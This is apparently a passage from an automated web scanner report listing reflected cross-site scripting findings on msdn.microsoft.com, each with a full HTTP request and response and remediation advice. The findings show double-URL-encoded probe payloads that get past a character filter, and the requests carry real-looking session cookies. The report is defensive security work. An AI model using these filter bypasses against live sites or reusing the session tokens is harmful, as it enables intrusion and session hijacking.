Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582940(office.11).aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18002%2522%253e%253ca%253e6324386485a was submitted in the REST URL parameter 1. This input was echoed as 18002"><a>6324386485a in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

The application should not URL-decode the value of REST URL parameter 1 a second time: the web server has already decoded it once, and the extra decode is what turns the %2522 and %253c sequences that slipped past the character filter into a literal quote and angle bracket. Input validation must run after all custom canonicalisation is complete, and the value must be HTML-attribute-encoded at the point where it is written into the fromPage hidden input on the error page.

Request

GET /en-us18002%2522%253e%253ca%253e6324386485a/library/dd582940(office.11).aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/library/dd582938(office.11).aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:22:51&Microsoft.NumberOfVisits=1&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:22:51&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; MS0=e6b8850fc3b54b87b9cd070b16412ced; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8J00021AU0002g1AU00

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:55:53 GMT
Content-Length: 9196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us18002"><a>6324386485a/library/dd582940(office.11)" />
...[SNIP]...

2.79. http://msdn.microsoft.com/en-us/library/dd582940(office.11).aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582940(office.11).aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c36af%2522%253e%253ca%253e86108dcf880 was submitted in the REST URL parameter 2. This input was echoed as c36af"><a>86108dcf880 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

The application should not URL-decode the value of REST URL parameter 2 a second time: the web server has already decoded it once, and the extra decode is what turns the %2522 and %253c sequences that slipped past the character filter into a literal quote and angle bracket. Input validation must run after all custom canonicalisation is complete, and the value must be HTML-attribute-encoded at the point where it is written into the fromPage hidden input on the error page.

Request

GET /en-us/libraryc36af%2522%253e%253ca%253e86108dcf880/dd582940(office.11).aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/library/dd582938(office.11).aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:22:51&Microsoft.NumberOfVisits=1&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:22:51&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; MS0=e6b8850fc3b54b87b9cd070b16412ced; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8J00021AU0002g1AU00

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:56:24 GMT
Content-Length: 9196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryc36af"><a>86108dcf880/dd582940(office.11)" />
...[SNIP]...

2.80. http://msdn.microsoft.com/en-us/library/dd582940(office.11).aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582940(office.11).aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93bc5%2522%253e%253ca%253e7a158e741b3 was submitted in the REST URL parameter 3. This input was echoed as 93bc5"><a>7a158e741b3 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

The application should not URL-decode the value of REST URL parameter 3 a second time: the web server has already decoded it once, and the extra decode is what turns the %2522 and %253c sequences that slipped past the character filter into a literal quote and angle bracket. Input validation must run after all custom canonicalisation is complete, and the value must be HTML-attribute-encoded at the point where it is written into the fromPage hidden input on the error page.

Request

GET /en-us/library/dd582940(office.11).aspx93bc5%2522%253e%253ca%253e7a158e741b3 HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/library/dd582938(office.11).aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:22:51&Microsoft.NumberOfVisits=1&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:22:51&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; MS0=e6b8850fc3b54b87b9cd070b16412ced; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8J00021AU0002g1AU00

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:56:54 GMT
Content-Length: 9206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582940(office.11).aspx93bc5"><a>7a158e741b3" />
...[SNIP]...

2.81. http://msdn.microsoft.com/en-us/library/default(loband).aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/default(loband).aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b717%2522%253e%253ca%253e026167f029 was submitted in the REST URL parameter 1. This input was echoed as 3b717"><a>026167f029 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

The application should not URL-decode the value of REST URL parameter 1 a second time: the web server has already decoded it once, and the extra decode is what turns the %2522 and %253c sequences that slipped past the character filter into a literal quote and angle bracket. Input validation must run after all custom canonicalisation is complete, and the value must be HTML-attribute-encoded at the point where it is written into the fromPage hidden input on the error page.

Request

GET /en-us3b717%2522%253e%253ca%253e026167f029/library/default(loband).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9211
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us3b717"><a>026167f029/library/default(loband)" />
...[SNIP]...

2.82. http://msdn.microsoft.com/en-us/library/default(loband).aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/default(loband).aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a550a%2522%253e%253ca%253eae5fa62af7a was submitted in the REST URL parameter 2. This input was echoed as a550a"><a>ae5fa62af7a in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

The application should not URL-decode the value of REST URL parameter 2 a second time: the web server has already decoded it once, and the extra decode is what turns the %2522 and %253c sequences that slipped past the character filter into a literal quote and angle bracket. Input validation must run after all custom canonicalisation is complete, and the value must be HTML-attribute-encoded at the point where it is written into the fromPage hidden input on the error page.

Request

GET /en-us/librarya550a%2522%253e%253ca%253eae5fa62af7a/default(loband).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9213
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/librarya550a"><a>ae5fa62af7a/default(loband)" />
...[SNIP]...

2.83. http://msdn.microsoft.com/en-us/library/default(loband).aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/default(loband).aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b270%2522%253e%253ca%253e1e436389099 was submitted in the REST URL parameter 3. This input was echoed as 8b270"><a>1e436389099 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

The application should not URL-decode the value of REST URL parameter 3 a second time: the web server has already decoded it once, and the extra decode is what turns the %2522 and %253c sequences that slipped past the character filter into a literal quote and angle bracket. Input validation must run after all custom canonicalisation is complete, and the value must be HTML-attribute-encoded at the point where it is written into the fromPage hidden input on the error page.

Request

GET /en-us/library/default(loband).aspx8b270%2522%253e%253ca%253e1e436389099 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9223
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/default(loband).aspx8b270"><a>1e436389099" />
...[SNIP]...

2.84. http://msdn.microsoft.com/en-us/library/ee663300(VS.85 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ee663300(VS.85

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce0fb%2522%253e%253ca%253e210aa7e2390 was submitted in the REST URL parameter 1. This input was echoed as ce0fb"><a>210aa7e2390 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

